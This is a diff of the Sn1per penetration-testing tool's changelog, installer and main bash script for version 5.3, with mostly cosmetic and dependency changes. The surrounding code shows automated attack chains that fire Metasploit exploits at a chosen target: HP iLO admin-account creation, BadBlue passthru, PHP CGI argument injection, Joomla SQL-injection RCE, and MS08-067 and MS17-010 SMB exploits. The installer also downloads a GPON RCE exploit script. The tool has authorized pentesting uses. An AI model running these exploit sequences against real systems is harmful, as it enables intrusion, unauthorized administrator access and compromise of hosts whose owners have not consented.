Sn1per by 1N3@CrowdShield

CHANGELOG.md

@@ -1,4 +1,8 @@
 ## CHANGELOG:
+* v5.3 - Updated AMass repo in install.sh
+* v5.3 - Removed CloudFail
+* v5.3 - Fixed issue with subfinder missing brute force list
+* v5.3 - Fixed issue with invalid dnsscan reference
 * v5.2 - Added SubOver subdomain takeover scanner
 * v5.2 - Added Subfinder subdomain enumeration tool
 * v5.2 - Added Amass subdomain enumeration tool

install.sh

@@ -23,7 +23,7 @@ LOOT_DIR=/usr/share/sniper/loot
 PLUGINS_DIR=/usr/share/sniper/plugins
 
 echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
-read answer 
+read answer
 
 mkdir -p $INSTALL_DIR 2> /dev/null
 mkdir -p $LOOT_DIR 2> /dev/null
@@ -68,18 +68,17 @@ git clone https://github.com/nccgroup/shocker.git
 git clone --depth 1 https://github.com/drwetter/testssl.sh.git 
 git clone https://github.com/BishopFox/spoofcheck.git
 git clone https://github.com/arthepsy/ssh-audit 
-git clone https://github.com/m0rtem/CloudFail.git
 git clone https://github.com/deibit/cansina
 git clone https://github.com/1N3/jexboss.git
 git clone https://github.com/maurosoria/dirsearch.git
 git clone https://github.com/jekyc/wig.git
 git clone https://github.com/rbsec/dnscan.git
-pip install -r $PLUGINS_DIR/dnscan/requirements.txt 
+pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt 
 mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
 unzip slurp.zip
 rm -f slurp.zip
 cd ~/go/bin/;go get github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
-cd ~/go/bin;go get -u github.com/caffix/amass;mv amass /usr/local/bin/
+cd ~/go/bin;go get -u github.com/OWASP/Amass;mv amass /usr/local/bin/
 cd ~/go/bin;go get github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
 cd $PLUGINS_DIR
 wget https://github.com/michenriksen/aquatone/blob/master/subdomains.lst -O /usr/share/sniper/plugins/Sublist3r/subdomains.lst
@@ -89,7 +88,6 @@ wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d4
 wget https://raw.githubusercontent.com/f3d0x0/GPON/master/gpon_rce.py -O /usr/share/sniper/bin/gpon_rce.py
 cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
-cd $PLUGINS_DIR/CloudFail/ && apt-get install python3-pip && pip3 install -r requirements.txt
 cd $PLUGINS_DIR/Findsploit/ && bash install.sh
 cd $PLUGINS_DIR/BruteX/ && bash install.sh
 cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt 

sniper

@@ -3,7 +3,7 @@
 # + -- --=[http://xerosecurity.com
 #
 
-VER="5.2"
+VER="5.3"
 BROWSER="firefox" # SET DEFAULT BROWSER
 INSTALL_DIR="/usr/share/sniper"
 PLUGINS_DIR="$INSTALL_DIR/plugins"
@@ -626,69 +626,45 @@ if [ "$MODE" = "webporthttp" ]; then
     fi
     cd $INSTALL_DIR
 
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     clusterd -i $TARGET -p $PORT
 
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
 
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
 
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
 
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
 
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
-    
-
 
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
@@ -887,21 +863,11 @@ if [ "$MODE" = "webporthttps" ]; then
     cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
     wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
 
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     clusterd --ssl -i $TARGET -p $PORT
     
-
-
-
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -923,77 +889,46 @@ if [ "$MODE" = "webporthttps" ]; then
     fi
     cd $INSTALL_DIR
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
 
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
 
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
-    
-
-
 
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
 
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -1167,14 +1102,14 @@ if [ "$MODE" = "stealth" ]; then
       echo -e "${OKGREEN}====================================================================================${RESET}"
       whois $TARGET
       echo -e "${OKGREEN}====================================================================================${RESET}"
-      echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
+      echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
       echo -e "${OKGREEN}====================================================================================${RESET}"
       if [ "$SUBLIST3R" = "1" ]; then
         python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
       fi
       if [ "$AMASS" = "1" ]; then
         echo -e "${OKGREEN}====================================================================================${RESET}"
-        echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
+        echo -e "$OKRED GATHERING DNS SUBDOMAINS  VIA AMASS $RESET"
         echo -e "${OKGREEN}====================================================================================${RESET}"
         amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
         cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
@@ -1182,15 +1117,15 @@ if [ "$MODE" = "stealth" ]; then
       fi
       if [ "$SUBFINDER" = "1" ]; then
         echo -e "${OKGREEN}====================================================================================${RESET}"
-        echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
+        echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
         echo -e "${OKGREEN}====================================================================================${RESET}"
-        subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
+        subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -w $DOMAINS_DEFAULT -d $TARGET 2>/dev/null
       fi
       echo -e "${OKGREEN}====================================================================================${RESET}"
-      echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
+      echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
       echo -e "${OKGREEN}====================================================================================${RESET}"
       if [ "$DNSCAN" = "1" ]; then
-        python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
+        python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
         cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
         dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
       fi
@@ -1661,12 +1596,12 @@ if [ "$RECON" = "1" ]; then
     echo -e "${OKGREEN}====================================================================================${RESET}"
     whois $TARGET
     echo -e "${OKGREEN}====================================================================================${RESET}"
-    echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
+    echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
     if [ "$AMASS" = "1" ]; then
       echo -e "${OKGREEN}====================================================================================${RESET}"
-      echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
+      echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
       echo -e "${OKGREEN}====================================================================================${RESET}"
       amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
       cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
@@ -1675,12 +1610,12 @@ if [ "$RECON" = "1" ]; then
 
     if [ "$SUBFINDER" = "1" ]; then
       echo -e "${OKGREEN}====================================================================================${RESET}"
-      echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
+      echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
       echo -e "${OKGREEN}====================================================================================${RESET}"
-      subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
+      subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -w $DOMAINS_DEFAULT -d $TARGET 2>/dev/null
     fi
     echo -e "${OKGREEN}====================================================================================${RESET}"
-    echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
+    echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     if [ "$DNSCAN" = "1" ]; then
       python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
@@ -1986,10 +1921,6 @@ else
     echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     clusterd -i $TARGET
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2010,75 +1941,39 @@ else
       echo -e "${OKGREEN}====================================================================================${RESET}"
       nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
     fi
-
-
-    
     cd $INSTALL_DIR
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2294,10 +2189,6 @@ else
     echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     clusterd --ssl -i $TARGET
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2318,79 +2209,38 @@ else
       nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
     fi
     cd $INSTALL_DIR
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
     msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
-
-
-
-
-
-
     echo -e "${OKGREEN}====================================================================================${RESET}"
     echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
     echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2464,13 +2314,6 @@ else
   python $SAMRDUMP $TARGET
   nbtscan $TARGET
   nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smb-protocols --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
-  
-
-
-
-
-
-
   msfconsole -x "setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; use auxiliary/scanner/smb/smb_version; run; use auxiliary/scanner/smb/pipe_auditor; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; use exploit/windows/smb/ms06_040_netapi; run; use exploit/windows/smb/ms05_039_pnp; run; use exploit/windows/smb/ms10_061_spoolss; run; use exploit/windows/smb/ms09_050_smb2_negotiate_func_index; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_ms17_010; run; exit;"
 fi